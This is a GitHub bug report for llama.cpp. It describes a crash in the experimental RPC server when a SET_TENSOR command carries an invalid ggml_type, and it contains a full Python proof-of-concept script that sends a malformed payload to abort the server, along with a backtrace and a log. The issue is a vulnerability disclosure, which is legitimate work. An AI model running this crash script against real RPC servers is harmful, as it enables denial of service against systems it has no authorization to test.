Skip to content

Misc. bug: RPC server crash on SET_TENSOR with invalid ggml_type #13067

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
thevilledev opened this issue Apr 22, 2025 · 0 comments · May be fixed by #13069
Open

Misc. bug: RPC server crash on SET_TENSOR with invalid ggml_type #13067

thevilledev opened this issue Apr 22, 2025 · 0 comments · May be fixed by #13069

Comments

@thevilledev
Copy link

thevilledev commented Apr 22, 2025

Name and Version

$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0

Operating systems

Mac

Which llama.cpp modules do you know to be affected?

Other (Please specify in the next section)

Command line

./build/bin/rpc-server -p 50052

Problem description & steps to reproduce

Description

NOTE: This was originally reported as a security advisory. After discussing with the maintainers this has now been disclosed as a public issue, since the RPC server is still an experimental feature (see RPC example).

The rpc-server crashes when processing an RPC_CMD_SET_TENSOR command if the provided data contains an invalid ggml_type value within the rpc_tensor structure. The server doesn't validate the type field read from the network before using it internally. This leads to a failed assertion (GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT)) during tensor deserialization (likely in ggml_new_tensor_4d), causing the server process to abort().

Expected Behavior

The server should validate the ggml_type read from the SET_TENSOR data before passing it to GGML functions. If the type is invalid, the server should:

  • Log an error message indicating invalid input.
  • Reject the command (e.g., send an error response or simply close the connection).
  • Continue running without crashing.

Actual Behavior

The server reads the invalid ggml_type (e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A GGML_ASSERT checking the type validity fails, causing the server process to terminate via abort(). The client typically sees the connection break unexpectedly.

Steps to Reproduce

  1. Clone the repository: git clone [email protected]:ggml-org/llama.cpp.git && cd llama.cpp
  2. Build the rpc-server binary: cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server
  3. Run the server from the build directory: ./bin/rpc-server -p 50052
  4. Run the Python Proof of Concept script below (save as poc_rpc_crash.py): python poc_rpc_crash.py
import socket
import struct
import sys
import time

# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052

# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14

# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024 # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE # Value for the internal size field
CHUNK_SIZE = 1024 # Send data in 1KB chunks

# --- Helper Functions ---

def p8(value):
    """Packs an integer into a 1-byte byte string (unsigned char)."""
    return struct.pack('<B', value)

def p64(value):
    """Packs an integer into an 8-byte byte string (unsigned long long)."""
    return struct.pack('<Q', value)

def u64(value_bytes):
    """Unpacks an 8-byte byte string into an integer (unsigned long long)."""
    return struct.unpack('<Q', value_bytes)[0]

def recv_exact(sock, num_bytes):
    """Receives exactly num_bytes from the socket."""
    data = b''
    start_time = time.time()
    # Use socket timeout if set
    timeout = sock.gettimeout()

    while len(data) < num_bytes:
        try:
            # Check for timeout if applicable
            if timeout and (time.time() - start_time > timeout):
                print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            # Calculate remaining bytes, request at most CHUNK_SIZE
            remaining = num_bytes - len(data)
            chunk = sock.recv(min(remaining, CHUNK_SIZE))
            if not chunk:
                # Connection closed prematurely
                print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            data += chunk
        except socket.timeout:
            print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
            return None
        except OSError as e:
            print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
            return None
    return data

def send_all(sock, data):
    """Sends all data reliably."""
    try:
        sock.sendall(data)
        return True
    except OSError as e:
        print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
        return False

def send_data_chunks_native(sock, size):
    """Sends 'size' bytes of 'A' in chunks using standard sockets."""
    bytes_sent = 0
    num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
    for i in range(num_chunks):
        current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
        chunk = b'A' * current_chunk_size
        if not send_all(sock, chunk):
            print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
            return False
        bytes_sent += current_chunk_size
    return True

# --- Main Logic ---

def run_exploit_native(host, port):
    print(f"[*] Connecting to {host}:{port}...")
    sock = None
    try:
        # Set a connection timeout
        sock = socket.create_connection((host, port), timeout=10)
        print("[+] Connected.")
        # Set a timeout for subsequent socket operations
        sock.settimeout(15)

        print("[*] Performing HELLO handshake...")
        hello_cmd = p8(RPC_CMD_HELLO)
        hello_input_size = p64(0)
        hello_packet = hello_cmd + hello_input_size
        if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")

        hello_resp_size_bytes = recv_exact(sock, 8)
        if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
        hello_resp_size = u64(hello_resp_size_bytes)

        # Expecting 3 bytes: major, minor, patch version
        if hello_resp_size < 3:
            # Allow for potential future expansion, but need at least 3 for version
            print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
            # Attempt to read anyway if size > 0
            if hello_resp_size == 0:
                 raise ValueError("HELLO response size is zero.")

        hello_resp_data = recv_exact(sock, hello_resp_size)
        if not hello_resp_data or len(hello_resp_data) < 3:
            raise ConnectionError("Incomplete HELLO response data received")
        print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")

        print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
        cmd = p8(RPC_CMD_SET_TENSOR)

        # This is the size field read by recv_msg to determine buffer size
        internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)

        # This is the 'total payload size' field sent after the command byte.
        # It should reflect the size of data *following* this field.
        # In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
        actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
        actual_payload_size_field = p64(actual_payload_size_val)

        # Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
        fixed_header = cmd + actual_payload_size_field + internal_size_field
        print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")

        if not send_all(sock, fixed_header):
            raise ConnectionError("Failed to send fixed header")

        # Send the 1KB garbage data ('A' * 1024)
        print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
        if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
             raise ConnectionError("Failed during data chunk send")
        print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")

        # Expect the server to crash after receiving data and trying to process it
        print("[*] Waiting for server disconnect (expecting crash after processing header)...")
        # Try receiving a small amount of data. An empty read means disconnected (crashed).
        # Using a longer timeout here as processing might take a moment before crash
        sock.settimeout(10)
        recv_data = None
        try:
            recv_data = sock.recv(1024)
        except socket.timeout:
            # This could happen if the server hangs instead of crashing, less likely for this specific bug
            print("[-] Timeout waiting for server disconnect. Server might be hung?")
            # Still consider it potentially successful if timeout occurs after sending bad data
            print("[?] Vulnerability might still be triggered if server is unresponsive.")
            return # Exit gracefully
        except OSError as e:
             # Connection reset/broken pipe often indicates server crash
            print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
            return # Exit gracefully

        if recv_data:
            print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
        else:
            # recv() returning 0 bytes means the other side closed the connection cleanly.
            print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")

    except ConnectionRefusedError:
        print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
    except socket.timeout:
         print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
    except (ConnectionError, ValueError, OSError, struct.error) as e:
        print(f"[-] An error occurred: {e}", file=sys.stderr)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
        import traceback
        traceback.print_exc()
    finally:
        if sock:
            sock.close()
            print("[*] Connection closed.")

if __name__ == "__main__":
    target_host = DEFAULT_HOST
    target_port = DEFAULT_PORT
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
            sys.exit(1)

    run_exploit_native(target_host, target_port)

Debugger backtrace to confirm crash:

* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
    frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
    frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
    frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
    frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
    frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
    frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
    frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
    frame #9: 0x0000000100003214 rpc-server`main + 3012
    frame #10: 0x0000000198dfeb4c dyld`start + 6000

First Bad Commit

5e31828

Relevant log output

Starting RPC server v1.0.0
  endpoint       : 127.0.0.1:50052
  local cache    : n/a
  backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1]    61001 abort      ./bin/rpc-server
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant